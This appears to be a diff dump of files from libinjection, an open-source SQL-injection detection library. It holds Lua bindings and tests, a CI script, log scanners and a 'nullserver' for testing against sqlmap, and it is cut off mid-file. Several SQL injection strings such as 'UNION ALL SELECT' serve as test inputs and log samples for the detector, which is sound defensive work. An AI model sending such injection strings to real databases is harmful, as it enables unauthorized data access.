arg2 = libinjection_lua_lookup_word;
|
||||
arg3 = (void *) L;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
%typemap(out) stoken_t [ANY] {
|
||||
int i;
|
||||
lua_newtable(L);
|
||||
for (i = 0; i < $1_dim0; i++) {
|
||||
lua_pushnumber(L, i+1);
|
||||
SWIG_NewPointerObj(L, (void*)(& $1[i]), SWIGTYPE_p_stoken_t,0);
|
||||
lua_settable(L, -3);
|
||||
}
|
||||
SWIG_arg += 1;
|
||||
}
|
||||
|
||||
|
||||
%include "libinjection.h"
|
||||
%include "libinjection_sqli.h"
|
107
libinjection/lua/luatest.lua
Normal file
107
libinjection/lua/luatest.lua
Normal file
|
@ -0,0 +1,107 @@
|
|||
|
||||
require 'libinjection'
|
||||
|
||||
-- dofile('sqlifingerprints.lua')
|
||||
|
||||
-- silly callback that just calls back into C
|
||||
-- identical to libinjection_is_sqli(sql_state, string_input, nil)
|
||||
--
|
||||
function check_pattern_c(sqlstate)
|
||||
return(libinjection.sqli_blacklist(sqlstate) and
|
||||
libinjection.sqli_not_whitelist(sqlstate))
|
||||
end
|
||||
|
||||
-- half lua / half c checker
|
||||
-- use lua based fingerprint lookup and still uses C code
|
||||
-- to eliminate false positives
|
||||
function check_pattern(sqlstate)
|
||||
fp = sqlstate.pat
|
||||
if sqlifingerprints[fp] == true then
|
||||
-- try to eliminate certain false positives
|
||||
return(libinjection.sqli_not_whitelist(sqlstate))
|
||||
else
|
||||
-- not sqli
|
||||
return 0
|
||||
end
|
||||
end
|
||||
|
||||
function lookup_word(sqlstate, ltype, word)
|
||||
if ltype == 'X' then
|
||||
return words['0' .. word:upper()]
|
||||
else
|
||||
return words[word:upper()]
|
||||
end
|
||||
end
|
||||
|
||||
dofile('words.lua')
|
||||
|
||||
|
||||
-- THIS USES BUILT IN FINGERPRINTS
|
||||
-- (with last arg of 'nil')
|
||||
sqli = '1 union select * from table'
|
||||
|
||||
|
||||
sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, sqli, sqli:len(), 0)
|
||||
|
||||
print(libinjection.is_sqli(sql_state))
|
||||
print(sql_state.pat)
|
||||
print('----')
|
||||
|
||||
|
||||
|
||||
inputs = {
|
||||
"123 LIKE -1234.5678E+2;",
|
||||
"APPLE 1 9.123 'FOO' \"BAR\"",
|
||||
"/* BAR */ UNION ALL SELECT (2,3,4)",
|
||||
"1 || COS(+0X04) --FOOBAR",
|
||||
"dog apple @cat banana bar",
|
||||
"dog apple cat \"banana \'bar",
|
||||
"102 TABLE CLOTH"
|
||||
}
|
||||
|
||||
function benchmark(imax)
|
||||
local x,s
|
||||
local t0 = os.clock()
|
||||
local sql_state = libinjection.sqli_state()
|
||||
for x = 0, imax do
|
||||
s = inputs[(x % 7) + 1]
|
||||
libinjection.sqli_init(sql_state, s, s:len(), 0)
|
||||
libinjection.is_sqli(sql_state)
|
||||
end
|
||||
local t1 = os.clock()
|
||||
print( imax / (t1-t0) )
|
||||
end
|
||||
|
||||
function benchmark_callback(imax)
|
||||
local x,s
|
||||
local t0 = os.clock()
|
||||
local sql_state = libinjection.sqli_state()
|
||||
for x = 0, imax do
|
||||
s = inputs[(x % 7) + 1]
|
||||
libinjection.sqli_init(sql_state, s, s:len(), 0)
|
||||
libinjection.sqli_callback(sql_state, 'lookup_word');
|
||||
libinjection.is_sqli(sql_state)
|
||||
end
|
||||
local t1 = os.clock()
|
||||
print( imax / (t1-t0) )
|
||||
end
|
||||
|
||||
benchmark(1000000)
|
||||
benchmark_callback(1000000)
|
||||
|
||||
-- THIS USES LUA FINGERPRINTS via 'check_pattern' function above
|
||||
|
||||
if 0 then
|
||||
for x = 1,2 do
|
||||
ok = libinjection.is_sqli(sql_state)
|
||||
if ok == 1 then
|
||||
print(sql_state.pat)
|
||||
vec = sql_state.tokenvec
|
||||
for i = 1, sql_state.pat:len() do
|
||||
print(vec[i].type, vec[i].val)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
74
libinjection/lua/make_test.py
Executable file
74
libinjection/lua/make_test.py
Executable file
|
@ -0,0 +1,74 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import glob
|
||||
import sys
|
||||
|
||||
def readtestdata(filename):
|
||||
"""
|
||||
Read a test file and split into components
|
||||
"""
|
||||
|
||||
state = None
|
||||
info = {
|
||||
'--TEST--': '',
|
||||
'--INPUT--': '',
|
||||
'--EXPECTED--': ''
|
||||
}
|
||||
|
||||
for line in open(filename, 'r'):
|
||||
line = line.rstrip()
|
||||
if line in ('--TEST--', '--INPUT--', '--EXPECTED--'):
|
||||
state = line
|
||||
elif state:
|
||||
info[state] += line + '\n'
|
||||
|
||||
# remove last newline from input
|
||||
info['--INPUT--'] = info['--INPUT--'][0:-1]
|
||||
|
||||
return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip())
|
||||
|
||||
def luaescape(s):
|
||||
return s.strip().replace("\\", "\\\\").replace("\n", "\\n").replace("'", "\\'")
|
||||
|
||||
def genluatest(fname, data):
|
||||
# TBD: change to python os.path
|
||||
name = fname.split('/')[-1]
|
||||
if name.startswith('test-tokens-'):
|
||||
testname = 'test_tokens'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-tokens_mysql'):
|
||||
testname = 'test_tokens_mysql'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-folding-'):
|
||||
testname = 'test_folding'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-sqli-'):
|
||||
testname = 'test_fingerprints'
|
||||
extra = ''
|
||||
else:
|
||||
#print "IGNORING: " + name
|
||||
return
|
||||
|
||||
name = name.replace('.txt', '')
|
||||
|
||||
print "is({0}('{1}'),\n '{2}{3}',\n '{4}')\n".format(
|
||||
testname,
|
||||
luaescape(data[1]),
|
||||
extra,
|
||||
luaescape(data[2]),
|
||||
name
|
||||
)
|
||||
|
||||
def test2lua(fname):
|
||||
data = readtestdata(fname)
|
||||
genluatest(fname, data)
|
||||
|
||||
def main():
|
||||
print "require 'testdriver'\n"
|
||||
files = glob.glob('../tests/test-*.txt')
|
||||
print "plan({0})\n".format(len(files))
|
||||
for testfile in sorted(files):
|
||||
test2lua(testfile)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
90
libinjection/lua/testdriver.lua
Normal file
90
libinjection/lua/testdriver.lua
Normal file
|
@ -0,0 +1,90 @@
|
|||
require 'libinjection'
|
||||
require 'Test.More'
|
||||
require 'Test.Builder.Tester'
|
||||
|
||||
function trim(s)
|
||||
return s:find'^%s*$' and '' or s:match'^%s*(.*%S)'
|
||||
end
|
||||
|
||||
function print_token_string(tok)
|
||||
local out = ''
|
||||
if tok.str_open ~= '\0' then
|
||||
out = out .. tok.str_open
|
||||
end
|
||||
out = out .. tok.val
|
||||
if tok.str_close ~= '\0' then
|
||||
out = out .. tok.str_close
|
||||
end
|
||||
return trim(out)
|
||||
end
|
||||
|
||||
function print_token(tok)
|
||||
local out = ''
|
||||
out = out .. tok.type
|
||||
out = out .. ' '
|
||||
if tok.type == 's' then
|
||||
out = out .. print_token_string(tok)
|
||||
elseif tok.type == 'v' then
|
||||
if tok.count == 1 then
|
||||
out = out .. '@'
|
||||
elseif tok.count == 2 then
|
||||
out = out .. '@@'
|
||||
end
|
||||
out = out .. print_token_string(tok)
|
||||
else
|
||||
out = out .. tok.val
|
||||
end
|
||||
return '\n' .. trim(out)
|
||||
end
|
||||
|
||||
function test_tokens(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(),
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
|
||||
while (libinjection.sqli_tokenize(sql_state) == 1) do
|
||||
out = out .. print_token(sql_state.current)
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
||||
function test_tokens_mysql(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(),
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_MYSQL)
|
||||
while (libinjection.sqli_tokenize(sql_state) == 1) do
|
||||
out = out .. print_token(sql_state.current)
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
||||
function test_folding(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(), 0)
|
||||
libinjection.sqli_fingerprint(sql_state,
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
|
||||
for i = 1, sql_state.fingerprint:len() do
|
||||
-- c array is still 0 based
|
||||
out = out .. print_token(libinjection.sqli_get_token(sql_state, i-1))
|
||||
end
|
||||
-- hack for when there is no output
|
||||
if out == '' then
|
||||
out = '\n'
|
||||
end
|
||||
|
||||
return out
|
||||
end
|
||||
|
||||
function test_fingerprints(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(), 0)
|
||||
local issqli = libinjection.is_sqli(sql_state)
|
||||
if issqli == 1 then
|
||||
out = sql_state.fingerprint
|
||||
end
|
||||
return out
|
||||
end
|
||||
|
85
libinjection/make-ci.sh
Executable file
85
libinjection/make-ci.sh
Executable file
|
@ -0,0 +1,85 @@
|
|||
#!/bin/sh
|
||||
# this is the script that runs in CI
|
||||
set -e
|
||||
|
||||
DASH=----------------------
|
||||
echo $DASH
|
||||
gcc --version
|
||||
echo $DASH
|
||||
make clean
|
||||
make -e check
|
||||
make clean
|
||||
|
||||
#
|
||||
# Code coverage
|
||||
#
|
||||
export CC=gcc
|
||||
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
|
||||
|
||||
echo $DASH
|
||||
echo "Generating code coverage"
|
||||
echo "CFLAGS=$CFLAGS"
|
||||
echo
|
||||
make -e check
|
||||
if [ -n "$COVERALLS_REPO_TOKEN" ] ; then
|
||||
echo "uploading to coveralls"
|
||||
coveralls \
|
||||
--gcov-options '\-lp' \
|
||||
--exclude-pattern '.*h' \
|
||||
--exclude src/reader.c \
|
||||
--exclude src/example1.c \
|
||||
--exclude src/fptool.c \
|
||||
--exclude src/test_speed_sqli.c \
|
||||
--exclude src/test_speed_xss.c \
|
||||
--exclude src/testdriver.c \
|
||||
--exclude src/html5_cli.c \
|
||||
--exclude src/sqli_cli.c \
|
||||
--exclude python
|
||||
fi
|
||||
echo
|
||||
unset CC
|
||||
unset CFLAGS
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
clang --version
|
||||
echo $DASH
|
||||
./configure-clang.sh
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
echo "CLANG STATIC ANALYZER"
|
||||
echo
|
||||
cd src
|
||||
make analyze
|
||||
|
||||
echo
|
||||
echo $DASH
|
||||
cppcheck --version
|
||||
echo
|
||||
|
||||
cppcheck --std=c89 \
|
||||
--enable=all \
|
||||
--inconclusive \
|
||||
--suppress=variableScope \
|
||||
--suppress=missingIncludeSystem \
|
||||
--quiet \
|
||||
--error-exitcode=1 \
|
||||
--template='{file}:{line} {id} {severity} {message}' \
|
||||
.
|
||||
echo "passed"
|
||||
|
||||
echo $DASH
|
||||
export CFLAGS="-Wall -Wextra -Werror -pedantic -ansi -g -O1"
|
||||
export VALGRIND="valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/build/src/alpine.supp"
|
||||
echo "GCC + VALGRIND"
|
||||
echo $VALGRIND
|
||||
echo
|
||||
make clean
|
||||
make -e check
|
||||
unset VALGRIND
|
||||
unset CFLAGS
|
||||
echo
|
||||
|
||||
echo
|
||||
echo "Done!"
|
28
libinjection/misc/gittag.sh
Executable file
28
libinjection/misc/gittag.sh
Executable file
|
@ -0,0 +1,28 @@
|
|||
#!/bin/bash
|
||||
set -e
|
||||
|
||||
# automated basic git tagging
|
||||
# 1) edit the version number in
|
||||
# c/libinjection_sqli.c
|
||||
# pyton/setup.py
|
||||
# 2) git add and commit
|
||||
# 3) run this
|
||||
# 4) done!
|
||||
#
|
||||
|
||||
# get tag number
|
||||
TAG=`grep 'LIBINJECTION_VERSION' ../c/libinjection_sqli.c | awk -F '"' '{print $2}' | tr -d '[[:space:]]'`
|
||||
|
||||
TAG="v${TAG}"
|
||||
|
||||
echo "TAG = ${TAG}"
|
||||
echo "Tagging locally"
|
||||
git tag -a "${TAG}" -m ${TAG}
|
||||
echo "Sharing..."
|
||||
git push origin "${TAG}"
|
||||
|
||||
git tag
|
||||
echo "DONE"
|
||||
|
||||
|
||||
|
45
libinjection/misc/home.md
Normal file
45
libinjection/misc/home.md
Normal file
|
@ -0,0 +1,45 @@
|
|||
LIBINJECTION
|
||||
==========================
|
||||
|
||||
Libinjection is a small C library to detect SQLi attacks in user input with the following goals:
|
||||
|
||||
* Open. Source code is on [GitHub](https://github.com/client9/libinjection/).
|
||||
* Low _false-positives_. When there are high false positives, people tend to turn off any WAF or protection.
|
||||
* Excellent detection of SQLi.
|
||||
* High performance (currently [over 500,000 TPS](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-speed/latest/console.txt))
|
||||
* Easy to test and QA
|
||||
* Easy to integrate and extend
|
||||
|
||||
### [Try it now](/diagnostics)
|
||||
|
||||
### Easy to integrate
|
||||
|
||||
* Standard C code, and compiles as C99 and C++, with bindings to
|
||||
* [Python](https://github.com/client9/libinjection/wiki/doc-sqli-python)
|
||||
* [PHP](https://github.com/client9/libinjection/wiki/doc-sqli-php)
|
||||
* [Lua](https://github.com/client9/libinjection/tree/master/lua)
|
||||
* Small - about [1500 lines of code](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-loc/latest/console.txt) in three files
|
||||
* Compiles on Linux/Unix/BSD, Mac and Windows
|
||||
* No threads used and thread safe
|
||||
* No recursion
|
||||
* No (heap) memory allocation
|
||||
* No extenal library dependencies
|
||||
* [400+ unit tests](https://github.com/client9/libinjection/tree/master/tests)
|
||||
* [98% code coverage](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-coverage-unittest/latest/lcov-html/libinjection/src/index.html)
|
||||
* [BSD License](https://github.com/client9/libinjection/blob/master/COPYING)
|
||||
|
||||
Third-Party Ports
|
||||
---------------------
|
||||
|
||||
* [java](https://github.com/Kanatoko/libinjection-Java)
|
||||
* At least two .NET ports exists
|
||||
* Another python wrapper
|
||||
|
||||
Applications
|
||||
---------------------
|
||||
|
||||
* [ModSecurity](http://www.modsecurity.org/) - since 2.7.4 release
|
||||
* [IronBee](https://www.ironbee.com) - since May 2013
|
||||
* Proprietary Honeypot
|
||||
* Proprietary WAF, Russia
|
||||
* Proprietary WAF, Japan
|
64
libinjection/misc/logscanner.py
Executable file
64
libinjection/misc/logscanner.py
Executable file
|
@ -0,0 +1,64 @@
|
|||
#!/usr/bin/env python
|
||||
import sys
|
||||
import re
|
||||
import libinjection
|
||||
import urllib
|
||||
import urlparse
|
||||
|
||||
logre = re.compile(r' /diagnostics\?([^ ]+) HTTP')
|
||||
|
||||
notsqli = set([
|
||||
'1ov',
|
||||
'UEvEv',
|
||||
'v',
|
||||
'Uv',
|
||||
'Uv,',
|
||||
'UoEvE',
|
||||
'1v',
|
||||
'sov',
|
||||
'1nn',
|
||||
'UonnE',
|
||||
'no1',
|
||||
'Evk',
|
||||
'E1k',
|
||||
'E11k',
|
||||
'Ek',
|
||||
'Uv,Ev',
|
||||
'UvEvk',
|
||||
'UvEv,',
|
||||
'Uvon'
|
||||
])
|
||||
|
||||
def doline(logline):
|
||||
"""
|
||||
...GET /diagnostics?id=%22union+select HTTP/1.1
|
||||
"""
|
||||
mo = logre.search(logline)
|
||||
if not mo:
|
||||
return
|
||||
|
||||
sqli= False
|
||||
fp = None
|
||||
for key, val in urlparse.parse_qsl(mo.group(1)):
|
||||
val = urllib.unquote(val)
|
||||
extra = {}
|
||||
argsqli = libinjection.detectsqli(val, extra)
|
||||
if argsqli:
|
||||
fp = extra['fingerprint']
|
||||
print urllib.quote(val)
|
||||
sqli = sqli or argsqli
|
||||
|
||||
if False: # and not sqli:
|
||||
#print "\n---"
|
||||
#print mo.group(1)
|
||||
for key, val in urlparse.parse_qsl(mo.group(1)):
|
||||
val = urllib.unquote(val)
|
||||
extra = {}
|
||||
argsqli = libinjection.detectsqli(val, extra)
|
||||
if not argsqli and extra['fingerprint'] not in notsqli:
|
||||
print "NO", extra['fingerprint'], mo.group(1)
|
||||
print " ", val
|
||||
|
||||
if __name__ == '__main__':
|
||||
for line in sys.stdin:
|
||||
doline(line)
|
213
libinjection/misc/logscanner2.py
Executable file
213
libinjection/misc/logscanner2.py
Executable file
|
@ -0,0 +1,213 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import datetime
|
||||
import json
|
||||
import sys
|
||||
from urlparse import *
|
||||
import urllib
|
||||
import libinjection
|
||||
|
||||
from tornado import template
|
||||
from tornado.escape import *
|
||||
|
||||
import re
|
||||
import calendar
|
||||
|
||||
months = {
|
||||
'Jan':'01',
|
||||
'Feb':'02',
|
||||
'Mar':'03',
|
||||
'Apr':'04',
|
||||
'May':'05',
|
||||
'Jun':'06',
|
||||
'Jul':'07',
|
||||
'Aug':'08',
|
||||
'Sep':'09',
|
||||
'Oct':'10',
|
||||
'Nov':'11',
|
||||
'Dec':'12'
|
||||
}
|
||||
|
||||
# "time_iso8601":"2013-08-04T03:51:18+00:00"
|
||||
def parse_date(datestr):
|
||||
elems = (
|
||||
datestr[7:11],
|
||||
months[datestr[3:6]],
|
||||
datestr[0:2],
|
||||
datestr[12:14],
|
||||
datestr[15:17],
|
||||
datestr[18:20],
|
||||
)
|
||||
|
||||
return ( "{0}-{1}-{2}T{3}:{4}:{5}+00:00".format(*elems), calendar.timegm( [ int(i) for i in elems] ) )
|
||||
|
||||
|
||||
apachelogre = re.compile(r'^(\S*) (\S*) (\S*) \[([^\]]+)\] \"([^"\\]*(?:\\.[^"\\]*)*)\" (\S*) (\S*) \"([^"\\]*(?:\\.[^"\\]*)*)\" \"([^"]*)\" \"([^"]*)\"')
|
||||
|
||||
def parse_apache(line):
|
||||
mo = apachelogre.match(line)
|
||||
if not mo:
|
||||
return None
|
||||
(time_iso, timestamp) = parse_date(mo.group(4))
|
||||
try:
|
||||
(method, uri, protocol) = mo.group(5).split(' ', 2)
|
||||
except ValueError:
|
||||
(method, uri, protocol) = ('-', '-', '-')
|
||||
data = {
|
||||
'remote_addr': mo.group(1),
|
||||
'time_iso8601': time_iso,
|
||||
'timestamp' : timestamp,
|
||||
'request_protocol': protocol,
|
||||
'request_method': method,
|
||||
'request_uri': uri,
|
||||
'request_length': '',
|
||||
'request_time': '',
|
||||
'status': mo.group(6),
|
||||
'bytes_sent': '',
|
||||
'body_bytes-sent': int(mo.group(7)),
|
||||
'http_referrer': mo.group(8),
|
||||
'http_user_agent': mo.group(9),
|
||||
'ssl_cipher': '',
|
||||
'ssl_protocol': ''
|
||||
}
|
||||
return data
|
||||
|
||||
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
|
||||
def chunks(l, n):
|
||||
"""
|
||||
Yield successive n-sized chunks from l.
|
||||
"""
|
||||
for i in xrange(0, len(l), n):
|
||||
yield l[i:i+n]
|
||||
|
||||
def breakify(s):
|
||||
output = ""
|
||||
for c in chunks(s, 40):
|
||||
output += c
|
||||
if ' ' not in c:
|
||||
output += ' '
|
||||
return output
|
||||
|
||||
def doline(line):
|
||||
|
||||
line = line.replace("\\x", "%").strip()
|
||||
try:
|
||||
data = json.loads(line)
|
||||
except ValueError, e:
|
||||
data = parse_apache(line)
|
||||
|
||||
if data is None:
|
||||
sys.stderr.write("BAD LINE: {0}\n".format(line))
|
||||
return None
|
||||
|
||||
if not data.get('request_uri','').startswith("/diagnostics"):
|
||||
return None
|
||||
|
||||
urlparts = urlparse(data['request_uri'])
|
||||
if len(urlparts.query) == 0:
|
||||
return None
|
||||
|
||||
qsl = [ x.split('=', 1) for x in urlparts.query.split('&') ]
|
||||
|
||||
target = None
|
||||
for k,v in qsl:
|
||||
if k == 'id':
|
||||
target = v
|
||||
break
|
||||
|
||||
if target is None:
|
||||
#print "no 'id'"
|
||||
return None
|
||||
|
||||
# part one, normal decode
|
||||
target = urllib.unquote_plus(target)
|
||||
|
||||
# do it again, but preserve '+'
|
||||
target = urllib.unquote(target)
|
||||
|
||||
sstate = libinjection.sqli_state()
|
||||
# BAD the string created by target.encode is stored in
|
||||
# sstate but not reference counted, so it can get
|
||||
# deleted by python
|
||||
# libinjection.sqli_init(sstate, target.encode('utf-8'), 0)
|
||||
|
||||
# instead make a temporary var in python
|
||||
# with the same lifetime as sstate (above)
|
||||
try:
|
||||
targetutf8 = target.encode('utf-8')
|
||||
#targetutf8 = target
|
||||
except UnicodeDecodeError, e:
|
||||
targetutf8 = target
|
||||
#if type(target) == str:
|
||||
# sys.stderr.write("Target is a string\n")
|
||||
#if type(target) == unicode:
|
||||
# sys.stderr.write("Target is unicde\n")
|
||||
#sys.stderr.write("OOps: {0}\n".format(e))
|
||||
#sys.stderr.write("Encode error: {0}\n".format(target))
|
||||
|
||||
|
||||
try:
|
||||
libinjection.sqli_init(sstate, targetutf8, 0)
|
||||
except TypeError:
|
||||
sys.stderr.write("fail in decode: {0}".format(targetutf8))
|
||||
if type(target) == str:
|
||||
sys.stderr.write("Target is a string\n")
|
||||
if type(target) == unicode:
|
||||
sys.stderr.write("Target is unicde\n")
|
||||
return None
|
||||
|
||||
sqli = bool(libinjection.is_sqli(sstate))
|
||||
|
||||
return (target, sqli, sstate.fingerprint, data['remote_addr'])
|
||||
|
||||
if __name__ == '__main__':
|
||||
s = """
|
||||
174.7.27.149 - - [29/Jul/2013:01:30:19 +0000] "GET /diagnostics?id=x|x||1&type=fingerprints HTTP/1.1" 200 1327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36" "-"
|
||||
"""
|
||||
s = """
|
||||
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=1+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
|
||||
{"timestamp":1371091563,"remote_ip":"219.110.171.2","request":"/diagnostics?id=2+UNION+ALL+SELECT+1<<<&type=fingerprints","method":"GET","status":200,"user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1","referrer":"https://libinjection.client9.com/diagnostics","duration_usec":160518 }
|
||||
"""
|
||||
if len(sys.argv) == 2:
|
||||
fh = open(sys.argv[1], 'r')
|
||||
else:
|
||||
fh = sys.stdin
|
||||
|
||||
targets = set()
|
||||
table = []
|
||||
for line in fh:
|
||||
parts = doline(line.strip())
|
||||
if parts is None:
|
||||
continue
|
||||
|
||||
# help it render in HTML
|
||||
if parts[0] in targets:
|
||||
continue
|
||||
else:
|
||||
targets.add(parts[0])
|
||||
|
||||
# add link
|
||||
# add form that might render ok in HTML
|
||||
# is sqli
|
||||
# fingerprint
|
||||
table.append( (
|
||||
"/diagnostics?id=" + url_escape(parts[0]),
|
||||
breakify(parts[0].replace(',', ', ').replace('/*', ' /*')),
|
||||
parts[1],
|
||||
parts[2],
|
||||
parts[3]
|
||||
)
|
||||
)
|
||||
|
||||
table = reversed(table)
|
||||
|
||||
loader = template.Loader(".")
|
||||
|
||||
txt = loader.load("logtable.html").generate(
|
||||
table=table,
|
||||
now = str(datetime.datetime.now()),
|
||||
ssl_protocol='',
|
||||
ssl_cipher=''
|
||||
)
|
||||
|
||||
print txt
|
8
libinjection/misc/mdgen.sh
Executable file
8
libinjection/misc/mdgen.sh
Executable file
|
@ -0,0 +1,8 @@
|
|||
#!/bin/bash
|
||||
fname=$1
|
||||
|
||||
echo '{% extends "base.html" %}'
|
||||
echo '{% block body %}'
|
||||
#github-markup $fname
|
||||
curl -H 'Content-Type: text/x-markdown' --data-binary @$fname https://api.github.com/markdown/raw
|
||||
echo '{% end %}'
|
79
libinjection/misc/modsecurity-merge.sh
Executable file
79
libinjection/misc/modsecurity-merge.sh
Executable file
|
@ -0,0 +1,79 @@
|
|||
#!/bin/bash
|
||||
|
||||
#
|
||||
# Sync ModSecurity / libinjection
|
||||
#
|
||||
|
||||
# explode on error
|
||||
set -e
|
||||
|
||||
#
|
||||
# CLONE LIBINJECTION
|
||||
#
|
||||
if [ ! -d libinjection ]; then
|
||||
git clone https://github.com/client9/libinjection.git
|
||||
else
|
||||
(cd libinjection; git pull)
|
||||
fi
|
||||
|
||||
pwd
|
||||
|
||||
#
|
||||
# CLONE MODSECURITY
|
||||
#
|
||||
if [ ! -d ModSecurity ]; then
|
||||
git clone https://github.com/client9/ModSecurity.git
|
||||
else
|
||||
( cd ModSecurity; git pull )
|
||||
fi
|
||||
pwd
|
||||
|
||||
#
|
||||
# Use right branch
|
||||
#
|
||||
(cd ModSecurity; git checkout remotes/trunk )
|
||||
|
||||
pwd
|
||||
|
||||
#
|
||||
# COPY IN NEW LIBINJECTION
|
||||
#
|
||||
cp libinjection/COPYING.txt ModSecurity/apache2/
|
||||
cp libinjection/c/libinjection.h ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli.c ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli.h ModSecurity/apache2/libinjection
|
||||
cp libinjection/c/libinjection_sqli_data.h ModSecurity/apache2/libinjection
|
||||
|
||||
|
||||
#
|
||||
# REGENERATE / BUILD
|
||||
#
|
||||
cd ModSecurity
|
||||
./autogen.sh
|
||||
./configure
|
||||
make
|
||||
make distclean
|
||||
|
||||
#
|
||||
# ADD NEW BITS
|
||||
#
|
||||
git add apache2/libinjection/COPYING.txt
|
||||
git add apache2/libinjection/libinjection.h
|
||||
git add apache2/libinjection/libinjection_sqli.h
|
||||
git add apache2/libinjection/libinjection_sqli.c
|
||||
git add apache2/libinjection/libinjection_sqli_data.h
|
||||
|
||||
# this file seems to get modified, reset just to be safe
|
||||
git checkout standalone/Makefile.in
|
||||
|
||||
git commit -m 'libinjection sync'
|
||||
|
||||
#
|
||||
# PUSH TO SPECIAL BRANCH
|
||||
#
|
||||
echo "pushing to remotes/trunk"
|
||||
git push origin remotes/trunk
|
||||
|
||||
#
|
||||
# PROFIT
|
||||
#
|
47
libinjection/misc/mysql_implicit_tests.py
Executable file
47
libinjection/misc/mysql_implicit_tests.py
Executable file
|
@ -0,0 +1,47 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
mysql_ops = (
|
||||
'AND',
|
||||
'&&',
|
||||
'=',
|
||||
'&',
|
||||
'|',
|
||||
'^',
|
||||
'DIV',
|
||||
'/',
|
||||
'<=>',
|
||||
'>=',
|
||||
'>',
|
||||
'<<',
|
||||
'<=',
|
||||
'<',
|
||||
'LIKE',
|
||||
'-',
|
||||
'%',
|
||||
'MOD',
|
||||
'!=',
|
||||
'<>',
|
||||
'NOT LIKE',
|
||||
'NOT REGEXP',
|
||||
'OR',
|
||||
'||',
|
||||
'+',
|
||||
'REGEXP',
|
||||
'>>',
|
||||
'RLIKE',
|
||||
'NOT RLIKE',
|
||||
'SOUNDS LIKE',
|
||||
'*',
|
||||
'XOR'
|
||||
)
|
||||
|
||||
print '# mysql implicit conversions tests'
|
||||
|
||||
for op in mysql_ops:
|
||||
if op == '+':
|
||||
op = '%2B'
|
||||
|
||||
print "A' {0} 'B".format(op)
|
||||
print "A '{0}' B".format(op)
|
||||
print "'{0}'".format(op)
|
||||
print "' {0} '".format(op)
|
111
libinjection/misc/nullserver.py
Executable file
111
libinjection/misc/nullserver.py
Executable file
|
@ -0,0 +1,111 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# A 'nullserver' that accepts input and generates output
|
||||
# to trick sqlmap into thinking it's a database-driven site
|
||||
#
|
||||
|
||||
import sys
|
||||
import logging
|
||||
import urllib
|
||||
|
||||
import tornado.httpserver
|
||||
import tornado.ioloop
|
||||
import tornado.web
|
||||
import libinjection
|
||||
|
||||
class ShutdownHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
global fd
|
||||
fd.close()
|
||||
sys.exit(0)
|
||||
|
||||
|
||||
class CountHandler(tornado.web.RequestHandler):
|
||||
def get(self):
|
||||
global count
|
||||
self.write(str(count) + "\n")
|
||||
|
||||
def boring(arg):
|
||||
if arg == '':
|
||||
return True
|
||||
|
||||
if arg == 'foo':
|
||||
return True
|
||||
|
||||
if arg == 'NULL':
|
||||
return True
|
||||
|
||||
try:
|
||||
float(arg)
|
||||
return True
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
return False;
|
||||
|
||||
class NullHandler(tornado.web.RequestHandler):
|
||||
|
||||
def get(self):
|
||||
global fd
|
||||
global count
|
||||
params = self.request.arguments.get('id', [])
|
||||
sqli = False
|
||||
|
||||
if len(params) == 0 or (len(params) == 1 and boring(params[0])):
|
||||
# if no args, or a single value with uninteresting input
|
||||
# then just exit
|
||||
self.write("<html><head><title>safe</title></head><body></body></html>")
|
||||
return
|
||||
|
||||
for arg in params:
|
||||
sqli = libinjection.detectsqli(arg)
|
||||
if sqli:
|
||||
break
|
||||
|
||||
# we didn't detect it :-(
|
||||
if not sqli:
|
||||
count += 1
|
||||
args = [ arg.strip() for arg in params ]
|
||||
#fd.write(' | '.join(args) + "\n")
|
||||
for arg in args:
|
||||
